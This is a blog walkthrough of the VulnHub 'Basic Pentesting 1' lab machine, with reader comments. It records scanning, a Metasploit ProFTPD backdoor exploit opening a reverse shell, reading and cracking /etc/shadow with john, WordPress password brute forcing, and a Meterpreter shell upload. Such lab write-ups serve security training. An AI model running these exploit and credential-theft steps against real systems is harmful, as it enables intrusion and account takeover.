You can download the box on this link https://www.vulnhub.com/entry/basic-pentesting-1,216/
Information Gathering
First, I want to know virtualbox IP address that assigned to the box.root@sempur:~# netdiscover -r 192.168.40.0/24 -i eth1
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.40.1 08:00:27:ce:cd:b1 1 60 PCS Systemtechnik GmbH
192.168.40.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.40.100 08:00:27:14:06:50 1 60 PCS Systemtechnik GmbH
* this result maybe difference, based on your virtualbox configurationAfter that, I want to know what services are running on this box. In this case, I used Nmap to know version, port, OS, etc.
root@sempur:~# nmap -sV 192.168.40.100 Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-12 15:24 WIB Nmap scan report for 192.168.40.100 Host is up (0.00020s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.3c 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.32 secondsYou can see the result, there is FTP, SSH, HTTP services running on this box. I need to know, which services are vulnerable.
Exploring FTP service
Based on nmap result, this server using ProFTPD version 1.3.3c which is vulnerable to backdoor command execution. You can find by googling or using searchsploit for more information.https://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_133c_backdoor
root@sempur:~# msfconsole msf > use exploit/unix/ftp/proftpd_133c_backdoor msf exploit(proftpd_133c_backdoor) > set rhost 192.168.40.100 rhost => 192.168.40.100 msf exploit(proftpd_133c_backdoor) > exploit [*] Started reverse TCP double handler on 192.168.40.101:4444 [*] 192.168.40.100:21 - Sending Backdoor Command [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo qZBpq8Ol9KN6lYs4; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "qZBpq8Ol9KN6lYs4\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.40.101:4444 -> 192.168.40.100:39812) at 2018-02-21 13:59:27 +0700 whoami rootBy using this exploit, you got root access, so you can explore this box as root.
Accessing SSH
After I got root by exploiting ProFTPD, I try to find another way to get in the box. Based on nmap result, there is SSH service running on this box. So, I think I can use this way to login as another user. I can use /etc/passwd and /etc/shadow to get password using john./etc/passwd
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false whoopsie:x:109:117::/nonexistent:/bin/false avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false saned:x:119:127::/var/lib/saned:/bin/false usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false marlinspike:x:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
/etc/shadow
root:!:17484:0:99999:7::: daemon:*:17379:0:99999:7::: bin:*:17379:0:99999:7::: sys:*:17379:0:99999:7::: sync:*:17379:0:99999:7::: games:*:17379:0:99999:7::: man:*:17379:0:99999:7::: lp:*:17379:0:99999:7::: mail:*:17379:0:99999:7::: news:*:17379:0:99999:7::: uucp:*:17379:0:99999:7::: proxy:*:17379:0:99999:7::: www-data:*:17379:0:99999:7::: backup:*:17379:0:99999:7::: list:*:17379:0:99999:7::: irc:*:17379:0:99999:7::: gnats:*:17379:0:99999:7::: nobody:*:17379:0:99999:7::: systemd-timesync:*:17379:0:99999:7::: systemd-network:*:17379:0:99999:7::: systemd-resolve:*:17379:0:99999:7::: systemd-bus-proxy:*:17379:0:99999:7::: syslog:*:17379:0:99999:7::: _apt:*:17379:0:99999:7::: messagebus:*:17379:0:99999:7::: uuidd:*:17379:0:99999:7::: lightdm:*:17379:0:99999:7::: whoopsie:*:17379:0:99999:7::: avahi-autoipd:*:17379:0:99999:7::: avahi:*:17379:0:99999:7::: dnsmasq:*:17379:0:99999:7::: colord:*:17379:0:99999:7::: speech-dispatcher:!:17379:0:99999:7::: hplip:*:17379:0:99999:7::: kernoops:*:17379:0:99999:7::: pulse:*:17379:0:99999:7::: rtkit:*:17379:0:99999:7::: saned:*:17379:0:99999:7::: usbmux:*:17379:0:99999:7::: marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7::: mysql:!:17486:0:99999:7::: sshd:*:17486:0:99999:7:::
root@sempur:~# unshadow passwd shadow > p.txt root@sempur:~# john p.txt Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt" Use the "--format=crypt" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x]) Press 'q' or Ctrl-C to abort, almost any other key for status marlinspike (marlinspike) 1g 0:00:00:00 DONE 1/3 (2018-02-21 11:34) 11.11g/s 88.88p/s 88.88c/s 88.88C/s marlinspike..marlinspikes Use the "--show" option to display all of the cracked passwords reliably Session completed root@sempur:~# john --show p.txt marlinspike:marlinspike:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash 1 password hash cracked, 0 leftAs you can see, john got password for marlinspike user. So, I try to login via SSH by using marlinspike as username and password. Apparently, user marlinspike is sudoers member.
root@sempur:~# ssh marlinspike@192.168.40.100 marlinspike@192.168.40.100's password: Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 19 packages can be updated. 19 updates are security updates. Last login: Mon Feb 12 06:50:26 2018 from 192.168.40.101 marlinspike@vtcsec:~$ whoami marlinspike marlinspike@vtcsec:~$ sudo su [sudo] password for marlinspike: root@vtcsec:/home/marlinspike# whoami root root@vtcsec:/home/marlinspike#
Exploring HTTP Service
I try to bruteforce directory using dirb and I got that website made by wordpress on directory secret.*You need add local DNS in file /etc/hosts
127.0.0.1 localhost 192.168.40.100 vtcsec
root@sempur:~# dirb http://192.168.40.100/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Feb 21 09:51:10 2018
URL_BASE: http://192.168.40.100/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.40.100/ ----
+ http://192.168.40.100/index.html (CODE:200|SIZE:177)
==> DIRECTORY: http://192.168.40.100/secret/
+ http://192.168.40.100/server-status (CODE:403|SIZE:302)
---- Entering directory: http://192.168.40.100/secret/ ----
+ http://192.168.40.100/secret/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/
==> DIRECTORY: http://192.168.40.100/secret/wp-content/
==> DIRECTORY: http://192.168.40.100/secret/wp-includes/
+ http://192.168.40.100/secret/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.40.100/secret/wp-admin/ ----
+ http://192.168.40.100/secret/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/css/
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/images/
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/includes/
+ http://192.168.40.100/secret/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/js/
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/maint/
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/network/
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/user/
---- Entering directory: http://192.168.40.100/secret/wp-content/ ----
+ http://192.168.40.100/secret/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.40.100/secret/wp-content/plugins/
==> DIRECTORY: http://192.168.40.100/secret/wp-content/themes/
---- Entering directory: http://192.168.40.100/secret/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.40.100/secret/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.40.100/secret/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.40.100/secret/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.40.100/secret/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.40.100/secret/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.40.100/secret/wp-admin/network/ ----
+ http://192.168.40.100/secret/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.40.100/secret/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.40.100/secret/wp-admin/user/ ----
+ http://192.168.40.100/secret/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.40.100/secret/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.40.100/secret/wp-content/plugins/ ----
+ http://192.168.40.100/secret/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.40.100/secret/wp-content/themes/ ----
+ http://192.168.40.100/secret/wp-content/themes/index.php (CODE:200|SIZE:0)
-----------------
END_TIME: Wed Feb 21 09:51:33 2018
DOWNLOADED: 36896 - FOUND: 13
Next, I use wpscan to find more information about this website.
root@sempur:~# wpscan --url http://vtcsec/secret/ --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[+] URL: http://vtcsec/secret/
[+] Started: Thu Feb 22 16:09:38 2018
[!] The WordPress 'http://vtcsec/secret/readme.html' file exists exposing a version number
[+] Interesting header: LINK: ; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://vtcsec/secret/xmlrpc.php
[!] Upload directory has directory listing enabled: http://vtcsec/secret/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://vtcsec/secret/wp-includes/
[+] WordPress version 4.9 (Released on 2017-11-15) identified from advanced fingerprinting, meta generator, links opml, stylesheets numbers
[!] 6 vulnerabilities identified from the version number
[!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
Reference: https://wpvulndb.com/vulnerabilities/8966
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
[i] Fixed in: 4.9.1
[!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
Reference: https://wpvulndb.com/vulnerabilities/8967
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
[i] Fixed in: 4.9.1
[!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
Reference: https://wpvulndb.com/vulnerabilities/8968
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
[i] Fixed in: 4.9.1
[!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
Reference: https://wpvulndb.com/vulnerabilities/8969
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
[i] Fixed in: 4.9.1
[!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/9006
Reference: https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
Reference: https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/ticket/42720
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
[i] Fixed in: 4.9.2
[!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
Reference: https://wpvulndb.com/vulnerabilities/9021
Reference: https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
Reference: https://github.com/quitten/doser.py
Reference: https://thehackernews.com/2018/02/wordpress-dos-exploit.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
[+] WordPress theme in use: twentyseventeen - v1.4
[+] Name: twentyseventeen - v1.4
| Latest version: 1.4 (up to date)
| Last updated: 2017-11-16T00:00:00.000Z
| Location: http://vtcsec/secret/wp-content/themes/twentyseventeen/
| Readme: http://vtcsec/secret/wp-content/themes/twentyseventeen/README.txt
| Style URL: http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css
| Theme Name: Twenty Seventeen
| Theme URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a...
| Author: the WordPress team
| Author URI: https://wordpress.org/
[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
+----+-------+-------------------+
| Id | Login | Name |
+----+-------+-------------------+
| 1 | admin | admin – My secret |
+----+-------+-------------------+
[!] Default first WordPress username 'admin' is still used
[+] Finished: Thu Feb 22 16:09:44 2018
[+] Requests Done: 103
[+] Memory used: 39.34 MB
[+] Elapsed time: 00:00:06
I got username, admin. So, I try to guess password 'admin', then I can log in to admin panel. Or, If you want using tool to bruteforce password, you can use wpscan to get password.root@sempur:~# wpscan --url http://vtcsec/secret/ --username admin --wordlist /usr/share/wordlists/fasttrack.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[+] URL: http://vtcsec/secret/
[+] Started: Thu Feb 22 16:35:23 2018
[!] The WordPress 'http://vtcsec/secret/readme.html' file exists exposing a version number
[+] Interesting header: LINK: ; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://vtcsec/secret/xmlrpc.php
[!] Upload directory has directory listing enabled: http://vtcsec/secret/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://vtcsec/secret/wp-includes/
[+] WordPress version 4.9 (Released on 2017-11-15) identified from advanced fingerprinting, meta generator, links opml, stylesheets numbers
[!] 6 vulnerabilities identified from the version number
[!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
Reference: https://wpvulndb.com/vulnerabilities/8966
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
[i] Fixed in: 4.9.1
[!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
Reference: https://wpvulndb.com/vulnerabilities/8967
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
[i] Fixed in: 4.9.1
[!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
Reference: https://wpvulndb.com/vulnerabilities/8968
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
[i] Fixed in: 4.9.1
[!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
Reference: https://wpvulndb.com/vulnerabilities/8969
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
[i] Fixed in: 4.9.1
[!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/9006
Reference: https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
Reference: https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/ticket/42720
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
[i] Fixed in: 4.9.2
[!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
Reference: https://wpvulndb.com/vulnerabilities/9021
Reference: https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
Reference: https://github.com/quitten/doser.py
Reference: https://thehackernews.com/2018/02/wordpress-dos-exploit.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
[+] WordPress theme in use: twentyseventeen - v1.4
[+] Name: twentyseventeen - v1.4
| Latest version: 1.4 (up to date)
| Last updated: 2017-11-16T00:00:00.000Z
| Location: http://vtcsec/secret/wp-content/themes/twentyseventeen/
| Readme: http://vtcsec/secret/wp-content/themes/twentyseventeen/README.txt
| Style URL: http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css
| Theme Name: Twenty Seventeen
| Theme URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a...
| Author: the WordPress team
| Author URI: https://wordpress.org/
[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Starting the password brute forcer
[+] [SUCCESS] Login : admin Password : admin
Brute Forcing 'admin' Time: 00:00:02 <== > (130 / 223) 58.29% ETA: 00:00:02
+----+-------+------+----------+
| Id | Login | Name | Password |
+----+-------+------+----------+
| | admin | | admin |
+----+-------+------+----------+
[+] Finished: Thu Feb 22 16:35:30 2018
[+] Requests Done: 225
[+] Memory used: 37.777 MB
[+] Elapsed time: 00:00:06
Get The Shell
After i got username and password, i need to get shell from this way. I use metasploit to upload the backdoor, and access the shell from msfconsole.https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_admin_shell_upload
root@sempur:~# msfconsole
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
=[ metasploit v4.16.15-dev ]
+ -- --=[ 1699 exploits - 968 auxiliary - 299 post ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set username admin
username => admin
msf exploit(wp_admin_shell_upload) > set password admin
password => admin
msf exploit(wp_admin_shell_upload) > set rhost vtcsec
rhost => vtcsec
msf exploit(wp_admin_shell_upload) > set targeturi /secret
targeturi => /secret
msf exploit(wp_admin_shell_upload) > show options
msf exploit(wp_admin_shell_upload) > exploit
[*] Started reverse TCP handler on 192.168.40.101:4444
[*] Authenticating with WordPress using admin:admin...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /secret/wp-content/plugins/fVdnYcKEGU/nrdKKXzecZ.php...
[*] Sending stage (37543 bytes) to 192.168.40.100
[*] Meterpreter session 1 opened (192.168.40.101:4444 -> 192.168.40.100:45522) at 2018-02-22 15:15:44 +0700
[+] Deleted nrdKKXzecZ.php
[+] Deleted fVdnYcKEGU.php
meterpreter > sysinfo
Computer : vtcsec
OS : Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64
Meterpreter : php/linux
meterpreter > shell
whoami
www-data
Finally, i got shell from metasploit, but the user still www-data, if you want get root permission, you need escalate the privilege. Exploiting the FTP server is the best way to get root access (in my opinion).
that is very awesome and easy to understand!
ReplyDeleteI will try it And keep in touch with result ASAP
thank you dear !
thanks dude, appreciate
Deletehello dear,
Deletethere is an error in exploit module
it gave me
"Exploit aborted due to failure: unexpected-reply: Failed to upload the payload"
what is the solution for that?
I had the same problem, but i solved it by modifiying the lab vm network. Change the vm lab network from Host only to Nat.
DeleteHave fun.
This comment has been removed by the author.
ReplyDeleteHello, this weekend is good for me, since this time i am reading this enormous informative article here at my home. Pentesting Services
ReplyDelete